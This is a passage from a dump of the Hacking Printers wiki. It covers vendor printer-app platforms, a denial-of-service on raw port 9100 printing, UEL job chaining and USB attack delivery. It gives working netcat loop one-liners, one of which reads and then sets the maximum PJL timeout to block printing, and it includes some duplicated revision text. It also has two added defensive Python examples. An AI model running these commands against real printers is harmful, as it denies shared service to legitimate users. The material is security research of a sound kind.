| style="text-align:left;" | EIP || || ✔
| style="text-align:left;" | unknown
|-
| style="text-align:left;" | Canon
| style="text-align:left;" | MEAP || ✔ || ✔
| style="text-align:left;" | unknown
|-
| style="text-align:left;" | Brother
| style="text-align:left;" | BSI || || ✔
| style="text-align:left;" | unknown
|-
| style="text-align:left;" | Lexmark
| style="text-align:left;" | eSF || ✔ ||
| style="text-align:left;" | unknown
|-
| style="text-align:left;" | Samsung
| style="text-align:left;" | XOA || ✔ || ✔
| style="text-align:left;" | web server
|-
| style="text-align:left;" | Ricoh
| style="text-align:left;" | ESA || ✔ ||
| style="text-align:left;" | unknown
|-
| style="text-align:left;" | Kyocera/Utax
| style="text-align:left;" | HyPAS || ✔ || ✔
| style="text-align:left;" | USB drive
|-
| style="text-align:left;" | Konica Minolta
| style="text-align:left;" | bEST || || ✔
| style="text-align:left;" | unknown
|-
| style="text-align:left;" | Toshiba
| style="text-align:left;" | e-Bridge || || ✔
| style="text-align:left;" | unknown
|-
| style="text-align:left;" | Sharp
| style="text-align:left;" | OSA || || ✔
| style="text-align:left;" | unknown
|-
| style="text-align:left;" | Oki
| style="text-align:left;" | sXP || || ✔
| style="text-align:left;" | unknown
|-
|}

'''How to test for this attack?''' Obtain an SDK and write your own proof-of-concept application, or find a ‘printer app’ which already does what you want (for example, automatically upload scanned documents to FTP). Also check which protection mechanisms exist for installing custom software on the device.

'''Who can perform this attack?''' Dependent on how software packages are deployed.
== Results == On older HP laser printers, arbitrary Java bytecode can be executed as demonstrated by <ref name="phenoelit2002embedded"/> and <ref name="mueller2016printers"/>. Security is based on the password of the embedded web server which can be easily readout with PostScript or bypassed by restoring factory defaults. It is hard to make a reasoned statement on the security of other software platforms because of lacking access to the SDK and/or proper technical documentation. A comparison of platforms, applied technologies and – where known – software package deployment procedures is given below: {| class="wikitable" style="text-align:center" |- ! Vendor !! Platform !! Embedded Java !! Web services !! Deployment |- | style="text-align:left;" | HP | style="text-align:left;" | Chai/OXP || ✔ || ✔ | style="text-align:left;" | web server |- | style="text-align:left;" | Xerox/Dell | style="text-align:left;" | EIP || || ✔ | style="text-align:left;" | unknown |- | style="text-align:left;" | Canon | style="text-align:left;" | MEAP || ✔ || ✔ | style="text-align:left;" | unknown |- | style="text-align:left;" | Brother | style="text-align:left;" | BSI || || ✔ | style="text-align:left;" | unknown |- | style="text-align:left;" | Lexmark | style="text-align:left;" | eSF || ✔ || | style="text-align:left;" | unknown |- | style="text-align:left;" | Samsung | style="text-align:left;" | XOA || ✔ || ✔ | style="text-align:left;" | web server |- | style="text-align:left;" | Ricoh | style="text-align:left;" | ESA || ✔ || | style="text-align:left;" | unknown |- | style="text-align:left;" | Kyocera/Utax | style="text-align:left;" | HyPAS || ✔ || ✔ | style="text-align:left;" | USB drive |- | style="text-align:left;" | Konica Minolta | style="text-align:left;" | bEST || || ✔ | style="text-align:left;" | unknown |- | style="text-align:left;" | Toshiba | style="text-align:left;" | e-Bridge || || ✔ | style="text-align:left;" | unknown |- | style="text-align:left;" | Sharp | 
style="text-align:left;" | OSA || || ✔ | style="text-align:left;" | unknown |- | style="text-align:left;" | Oki | style="text-align:left;" | sXP || || ✔ | style="text-align:left;" | unknown |- |} '''How to test for this attack?''' Obtain an SDK and write your own proof-of-concept application or find a ‘printer app’ which already does what you want (for example, automatically upload scanned documents to FTP). Also check which protection mechanisms exist to install custom software on the device. '''Who can perform this attack?''' Dependend on how software packages are deployed. ---- 2e736d129301a9d0433885d10e2d984f74826990 197 194 2017-01-23T12:17:37Z Admin 1 wikitext text/x-wiki In the recent years, printer vendors have started to introduce the '''possibility to install custom software on their devices'''. The format of such ‘printer apps’ is proprietary and SDKs are not available to the public. The feature of writing customized software which runs on printers was intended and is reserved for resellers and contractors, not for end-users. Hereby a printer fleet can be adapted to the special needs and business processes of a company; document solution providers can easily integrate printers into their management software. One popular example is ''NSi AutoStore'' <ref>''[http://www.notablesolutions.com/products/nsi-autostore/ NSi AutoStore]'', Nuance Communications, Inc.</ref> which can be installed on many MFPs and automatically uploads scanned or copied documents to predefined locations. Obviously, the feature to run custom code on a printer device is a potential security thread. Furthermore code signing of software packages is potentially harder than it is for firmware as software is not only written by the printer manufacturer but by a broader range of developers who need to be in possession of the secret key to sign their software. Therefore it is logical to include the secret key in SDKs which are protected by being exclusively available from developer platforms. 
Transmission channel 0 35 175 174 2017-01-21T11:44:08Z Admin 1 wikitext text/x-wiki

If print jobs are processed in series – which is assumed for most devices – only one job can be handled at a time. If this job does not terminate, the printing channel is effectively blocked until a timeout is triggered, preventing legitimate users from printing. This trivial denial-of-service attack can be improved by setting a high timeout value with [[PJL]].

'''How to test for this attack?'''

Connecting to port 9100/tcp of a printer without closing the connection prevents most devices from accepting new print jobs.
Tests can be performed using the ''netcat'' <ref>''[http://nc110.sourceforge.net/ Netcat – TCP/IP Swiss Army Knife]'', Hobbit, 1996</ref> utility in a loop as shown below:

<syntaxhighlight lang=sh>
while true; do nc printer 9100; done
</syntaxhighlight>

A more advanced version of this DoS attack which sets a higher timeout is given below.

<syntaxhighlight lang=sh>
# get maximum timeout value with PJL
MAX="`echo "@PJL INFO VARIABLES" | nc -w3 printer 9100 |\
grep -E -A2 '^TIMEOUT=' | tail -n1 | awk '{print $1}'`"
# connect and set maximum timeout for current job with PJL
while true; do echo "@PJL SET TIMEOUT=$MAX" | nc printer 9100; done
</syntaxhighlight>

While the PJL reference specifies a maximum timeout of 300 seconds <ref>''[http://h10032.www1.hp.com/ctg/Manual/bpl13208.pdf Printer Job Language Technical Reference Manual]'', HP Inc., 1997, ch. 6-25</ref>, in practice maximum PJL timeouts may range from 15 to 2147483 seconds. Hence, this value is first retrieved from the printer and then set in all further connections. The advantage of this approach is that the number of connections the attacker has to make is minimized, while it becomes even harder for legitimate users to win the free time slot (race condition) needed to deploy a print job. Note that even print jobs received from other printing channels like IPP or LPD are not processed anymore as long as the connection is kept open.

To check the PJL timeout settings for your printer, [[PRET]] can be used as follows:

<syntaxhighlight lang=sh>
./pret.py -q printer pjl
Connection to printer established
Welcome to the pret shell. Type help or ? to list commands.
printer:/> env timeout
TIMEOUT=15 [2 RANGE]
     5
     300
</syntaxhighlight>

'''Who can perform this attack?'''

Anyone who can access port 9100/tcp of a printer device. Note that this can even be accomplished with [[cross-site printing]] techniques as long as the website used to enforce XHR connections is kept open.
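The following is an added example (not code from this wiki or from PRET) for the defending side of the timeout attack above: it parses the <code>@PJL INFO VARIABLES</code> reply layout shown in the PRET output, reports how long one held connection can block the channel on a given device, and flags clients that repeatedly hold port 9100/tcp open while sending (almost) no data. The sample reply and the connection records are constructed.

```python
"""PJL TIMEOUT audit helpers (added example; not wiki or PRET code).
The INFO VARIABLES reply and the connection records below are constructed
to mirror the layout the page shows ('TIMEOUT=15 [2 RANGE]' then two bounds)."""
import re
from collections import Counter
from dataclasses import dataclass, field

PJL_SPEC_MAX_TIMEOUT = 300  # seconds, per the PJL Technical Reference

# Constructed sample reply; a real device lists many more variables.
SAMPLE_VARIABLES = (
    "@PJL INFO VARIABLES\r\n"
    "COPIES=1 [2 RANGE]\r\n\t1\r\n\t999\r\n"
    "PAPER=A4 [3 ENUMERATED]\r\n\tLETTER\r\n\tLEGAL\r\n\tA4\r\n"
    "TIMEOUT=15 [2 RANGE]\r\n\t5\r\n\t300\r\n"
    "\x0c"
)

_HEADER = re.compile(r"^(\w+)=(.*?)\s+\[(\d+)\s+(\w+)\]$")


@dataclass
class PjlVariable:
    name: str
    value: str
    kind: str                    # RANGE, ENUMERATED, STRING, ...
    options: list = field(default_factory=list)


def parse_info_variables(text: str) -> dict:
    """Parse the reply into {name: PjlVariable}; a header 'NAME=VALUE [N KIND]'
    is followed by N option lines (what the page's grep -A2 / tail -n1 reads)."""
    variables = {}
    lines = [ln.strip() for ln in text.replace("\x0c", "").splitlines()]
    i = 0
    while i < len(lines):
        match = _HEADER.match(lines[i])
        i += 1
        if not match:            # command echo, blank lines, unknown junk
            continue
        name, value, count, kind = match.groups()
        options = lines[i:i + int(count)]
        i += int(count)
        variables[name] = PjlVariable(name, value, kind, options)
    return variables


def timeout_exposure(variables: dict) -> dict:
    """Report how long one held connection can block the 9100 channel."""
    var = variables.get("TIMEOUT")
    if var is None or var.kind != "RANGE" or len(var.options) != 2:
        return {"present": False}
    low, high = int(var.options[0]), int(var.options[1])
    return {
        "present": True,
        "current": int(var.value),
        "min": low,
        "max": high,
        # A job may SET TIMEOUT up to 'max', so that is the worst case; a
        # device accepting far more than the spec's 300 s is the one to watch.
        "exceeds_spec": high > PJL_SPEC_MAX_TIMEOUT,
    }


@dataclass
class Connection:
    src: str
    dport: int
    seconds: float
    bytes_in: int          # payload the client sent before the socket closed


# Constructed records, as a flow collector might export them.
SAMPLE_CONNECTIONS = [
    Connection("10.0.0.7", 9100, 14.9, 0),        # idle 'nc printer 9100'
    Connection("10.0.0.9", 9100, 1.2, 48213),     # ordinary print job
    Connection("10.0.0.7", 9100, 15.0, 0),
    Connection("10.0.0.7", 9100, 14.8, 0),
    Connection("10.0.0.7", 9100, 299.8, 25),      # '@PJL SET TIMEOUT=300'
    Connection("10.0.0.11", 631, 400.0, 10),      # IPP, out of scope here
]


def suspicious_holds(conns, current_timeout: int, min_hits: int = 3) -> dict:
    """Return {src: count} for clients that repeatedly hold port 9100 open:
    a real job sends its data and closes, the attack sends nothing (or just a
    TIMEOUT command) and idles until the printer drops the connection."""
    idle_floor = 0.8 * current_timeout
    hits = Counter(
        c.src for c in conns
        if c.dport == 9100 and c.bytes_in < 64 and c.seconds >= idle_floor
    )
    return {src: n for src, n in hits.items() if n >= min_hits}


if __name__ == "__main__":
    exp = timeout_exposure(parse_info_variables(SAMPLE_VARIABLES))
    print(exp, suspicious_holds(SAMPLE_CONNECTIONS, exp["current"]))
```

Feed <code>parse_info_variables</code> the raw reply captured from a real device and <code>suspicious_holds</code> your own flow records; the thresholds (64 bytes, 80 % of the configured timeout) are assumptions to tune per fleet.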
= UEL =

The Universal Exit Language (UEL) is actually not a real [[Fundamentals#Printer_Control_Languages|job control]] ‘language’ but a single command used to terminate the current data stream: the escape character (<code>\x1b</code>), followed by <code>%-12345X</code>. It was originally introduced with HP's [[PCL]] and is supported by most modern laser printers. It is good practice for ‘printer drivers’ to invoke the UEL at the beginning and at the end of each print job, so that interpretation of the printer language is stopped/restarted and each job has its own, separate environment, as shown below:

<pre>
\x1b%-12345X
@PJL SET PAPER=A4
@PJL ENTER LANGUAGE=PCL
... [PCL datastream] ...
\x1b%-12345X
</pre>

Otherwise, for example, PJL settings like paper media size or PostScript definitions set in one print job would influence the next job. The UEL can be handy to string together multiple jobs into a single file/datastream sent to the printer. This can be used to fool [[Accounting_bypass#Page_counter_manipulation|hardware page counters]] or to switch the printing language in advanced [[Cross-site printing#Limitations_of_cross-site_printing|cross-site printing]] attacks, for example.
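The following Python code is an added example and not part of the wiki page: it splits a constructed datastream at UEL markers and reports the language each segment selects, which is what a print server doing per-job accounting needs in order to notice that a single upload actually carries several chained jobs rather than one.

```python
"""Split a raw print datastream at Universal Exit Language (UEL) markers.

Added example, not code from the Hacking Printers wiki.  A print server
that charges per submitted job can run this over an upload to see whether
it really contains one job, or several jobs chained with UEL (the trick the
wiki describes for fooling hardware page counters and for switching printer
languages).  The datastream below is constructed for the example.
"""
import re
from typing import List, Optional, Tuple

UEL = b"\x1b%-12345X"          # ESC %-12345X, resets the interpreter

# Constructed: three jobs bracketed by UEL the way a well-behaved driver
# emits them (PCL, then PostScript, then PCL again), chained into one stream.
SAMPLE_STREAM = (
    UEL + b"@PJL SET PAPER=A4\r\n@PJL ENTER LANGUAGE=PCL\r\n"
    + b"\x1bE... first PCL job ...\x1bE" + UEL
    + b"@PJL ENTER LANGUAGE=POSTSCRIPT\r\n%!PS\n/Helvetica findfont 12 scalefont setfont showpage\n"
    + UEL
    + b"@PJL ENTER LANGUAGE=PCL\r\n\x1bE... second PCL job ...\x1bE" + UEL
)

# "@PJL ENTER LANGUAGE = PCL": PJL allows spaces around '=' and is case-insensitive.
_ENTER_LANGUAGE = re.compile(rb"@PJL\s+ENTER\s+LANGUAGE\s*=\s*([A-Za-z0-9]+)", re.IGNORECASE)


def split_jobs(stream: bytes) -> List[bytes]:
    """Return the segments between UEL markers, dropping empty ones.

    Data outside any UEL pair (a driver that never sends UEL) comes back as a
    single segment, so a plain job still counts as one job.
    """
    return [segment for segment in stream.split(UEL) if segment.strip()]


def job_language(job: bytes) -> Optional[str]:
    """Interpreter a segment selects: the PJL ENTER LANGUAGE value if present,
    otherwise a guess from the first bytes (%! for PostScript, ESC for PCL)."""
    match = _ENTER_LANGUAGE.search(job)
    if match:
        return match.group(1).decode("ascii").upper()
    head = job.lstrip()
    if head.startswith(b"%!"):
        return "POSTSCRIPT"
    if head.startswith(b"\x1b"):
        return "PCL"
    return None


def describe(stream: bytes) -> List[Tuple[int, Optional[str]]]:
    """(size in bytes, language) for each UEL-delimited job in the stream."""
    return [(len(job), job_language(job)) for job in split_jobs(stream)]


def is_chained(stream: bytes) -> bool:
    """True when one submission carries more than one UEL-delimited job,
    which an accounting system should count (or reject) instead of
    treating the upload as a single job."""
    return len(split_jobs(stream)) > 1


if __name__ == "__main__":
    for size, lang in describe(SAMPLE_STREAM):
        print(f"{size:5d} bytes  {lang}")
    print("chained:", is_chained(SAMPLE_STREAM))   # chained: True
```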
= USB drive or cable =

[[File:USB-deployment-channel.png|thumb|160px|Printing over USB]]

Data can be sent to and received from a local printer by [https://en.wikipedia.org/wiki/USB USB] or [https://en.wikipedia.org/wiki/IEEE_1284 parallel] cables. Both channels are supported by [[PRET]] to communicate with the device. In addition, printers and MFPs often ship with ''Type-A'' USB ports which allow users to print directly from a USB device.
While plugged-in USB drives do not offer a bidirectional channel, their usage in a crowded copy room may seem less conspicuous. Obviously, exploiting USB printers requires the attacker to gain physical access to the device. However, this is not unrealistic in most institutions and companies: gaining physical access to a printer is generally easier than to other network components like servers or workstations, because printers are usually shared by and accessible to a whole department. Sneaking into an unlocked copy room and launching a malicious print job from a USB stick is only a matter of seconds. Further real-world scenarios include copy shops or publicly available printers at schools and universities.

<!-- and for PostScript based [[information disclosure]] attacks, the result can simply be leaked by printing it on paper -->
<!-- smart card based access control -->

'' '''Is your copy room always locked?''' ''

→ ''Related articles:'' [[Fundamentals#High-level_overview|Fundamentals]], [[Attack carriers]]
= Hacking Printers:About =

The '''Hacking Printers Wiki''' was created by [https://www.nds.rub.de/chair/people/jmueller/ Jens Müller], but its continued success depends on the contributions from many individuals in the security community. Thanks to everybody for your help!
= File descriptions =

* File:Cross-site-printing.png: Advanced cross-site printing with CORS spoofing
* File:Dedicated-print-server.png: Dedicated print servers as a countermeasure to sandbox printers
* File:Deployment-channels.png: Overview of channels to deploy (potentially malicious) print jobs
* File:Dictstack.png: The PostScript dictionary stack
* File:IPP-deployment-channel.png: IPP (malicious) print job deployment channel
* File:LPD-deployment-channel.png: LPD (malicious) print job deployment channel
* File:Overlay.jpg: Smiley overlay attack on other users' jobs
* File:PJL-display.png: PJL display ‘hack’
* File:Printing-overview.png: Attack the interpreters, not the printing channels
* File:Protocols.png: High-level overview of printing protocols and languages
* File:Raw-deployment-channel.png: Raw (malicious) print job deployment channel
* File:SMB-deployment-channel.png: SMB (malicious) print job deployment channel
* File:Shodan.png: Printers directly reachable over the Internet
* File:USB-deployment-channel.png: USB (malicious) print job deployment channel
* File:XSP-deployment-channel.png: XSP (malicious) print job deployment channel